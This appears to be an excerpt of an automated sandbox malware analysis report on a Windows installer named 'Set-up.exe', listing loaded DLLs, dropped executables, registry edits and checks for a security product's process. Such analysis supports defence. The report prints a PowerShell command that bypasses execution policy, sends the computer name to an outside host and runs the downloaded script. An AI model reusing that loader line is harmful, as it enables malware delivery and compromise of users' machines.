              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: mpr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: version.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wtsapi32.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: winsta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: textinputframework.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: coreuicomponents.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: ntmarta.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: coremessaging.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: shfolder.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: rstrtmgr.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: ncrypt.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: ntasn1.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: textshaping.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: dwmapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: sfc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: sfc_os.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: explorerframe.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: dlnashext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: wpdshext.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\System32\timeout.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: version.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: mpr.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: framedynos.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: dbghelp.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: srvcli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: netutils.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: sspicli.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: kernel.appcore.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: wbemcomn.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: winsta.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: amsi.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: userenv.dll
              Source: C:\Windows\System32\tasklist.exeSection loaded: profapi.dll
              Source: C:\Windows\System32\find.exeSection loaded: ulib.dll
              Source: C:\Windows\System32\find.exeSection loaded: fsutilext.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: apphelp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wsock32.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winmm.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: version.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: kernel.appcore.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: uxtheme.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: iconcodecservice.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windowscodecs.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: textshaping.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: windows.storage.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wldp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: winhttp.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: twinui.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: wintypes.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: powrprof.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: dwmapi.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: pdh.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: umpdc.dll
              Source: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exeSection loaded: shdocvw.dll
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{1f486a52-3cb1-48fd-8f50-b8dc300d9f9d}\InProcServer32Jump to behavior
              Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\tasklist.exe tasklist /FI "IMAGENAME eq wrsa.exe" /FO CSV /NH
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOwnerJump to behavior
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpWindow found: window name: TMainFormJump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: Set-up.exeStatic file information: File size 74868247 > 1048576
              Source: Binary string: wntdll.pdbUGP source: BrightLib.exe, 00000024.00000002.2524141455.00000000382E6000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2524283597.0000000038640000.00000004.00000800.00020000.00000000.sdmp
              Source: Binary string: wntdll.pdb source: BrightLib.exe, 00000024.00000002.2524141455.00000000382E6000.00000004.00000020.00020000.00000000.sdmp, BrightLib.exe, 00000024.00000002.2524283597.0000000038640000.00000004.00000800.00020000.00000000.sdmp

              Data Obfuscation

              barindex
              Suspicious powershell command line found
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (a
              Source: C:\Users\user\Desktop\Set-up.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell -exec bypass [Net.servicepOINTmANaGer]::SEcURiTyPrOtoCOl = [Net.SecUriTyprOtocoltYPe]::tLs12; $gD='https://dfgh.online/invoker.php?compName='+$env:computername; $pTSr = iWr -uRi $gD -uSebASIcpARsiNg -UsErAGent 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/57.36 (KHTML, like Gecko) Chrome/12.0.0.0 Safari/57.36'; IEx $Ptsr.Content; (aJump to behavior
              Source: PU6S498VOPMOZVY2Y7.tmp.8.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
              Source: PU6S498VOPMOZVY2Y7.exe.0.drStatic PE information: real checksum: 0x9307ce should be: 0x8615ed
              Source: PU6S498VOPMOZVY2Y7.tmp.6.drStatic PE information: real checksum: 0x33908a should be: 0x33af29
              Source: PU6S498VOPMOZVY2Y7.exe.0.drStatic PE information: section name: .didata
              Source: PU6S498VOPMOZVY2Y7.tmp.6.drStatic PE information: section name: .didata
              Source: PU6S498VOPMOZVY2Y7.tmp.8.drStatic PE information: section name: .didata
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798E8 push ebp; iretd 0_3_006798E9
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798E8 push ebp; iretd 0_3_006798E9
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798E8 push ebp; iretd 0_3_006798E9
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00679FF9 pushfd ; ret 0_3_00679FFA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00679FF9 pushfd ; ret 0_3_00679FFA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00679FF9 pushfd ; ret 0_3_00679FFA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798D0 push edx; iretd 0_3_006798D1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798D0 push edx; iretd 0_3_006798D1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798D0 push edx; iretd 0_3_006798D1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798E8 push ebp; iretd 0_3_006798E9
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798E8 push ebp; iretd 0_3_006798E9
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798E8 push ebp; iretd 0_3_006798E9
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00679FF9 pushfd ; ret 0_3_00679FFA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00679FF9 pushfd ; ret 0_3_00679FFA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00679FF9 pushfd ; ret 0_3_00679FFA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798D0 push edx; iretd 0_3_006798D1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798D0 push edx; iretd 0_3_006798D1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798D0 push edx; iretd 0_3_006798D1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798E8 push ebp; iretd 0_3_006798E9
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798E8 push ebp; iretd 0_3_006798E9
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798E8 push ebp; iretd 0_3_006798E9
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00679FF9 pushfd ; ret 0_3_00679FFA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00679FF9 pushfd ; ret 0_3_00679FFA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_00679FF9 pushfd ; ret 0_3_00679FFA
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798D0 push edx; iretd 0_3_006798D1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798D0 push edx; iretd 0_3_006798D1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_3_006798D0 push edx; iretd 0_3_006798D1
              Source: C:\Users\user\Desktop\Set-up.exeCode function: 0_2_02227A5A push ebp; iretd 0_2_02227A60
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_0096280F push eax; retf 2_2_00962819
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_00962196 push FFFFFFE9h; iretd 2_2_009621A1
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\BrightLib.exe (copy)Jump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2S59A.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\Desktop\Set-up.exeFile created: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeFile created: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\PU6S498VOPMOZVY2Y7.exeFile created: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpFile created: C:\Users\user\AppData\Roaming\ColorStreamLib\is-1H7IE.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-O0509.tmp\PU6S498VOPMOZVY2Y7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-2S59A.tmp\_isetup\_setup64.tmpJump to dropped file
              Source: C:\Users\user\AppData\Local\Temp\is-BFJG4.tmp\PU6S498VOPMOZVY2Y7.tmpFile created: C:\Users\user\AppData\Local\Temp\is-16TGC.tmp\_isetup\_isdecmp.dllJump to dropped file
              Source: C:\Users\user\Desktop\Set-up.exeProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\Desktop\Set-up.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
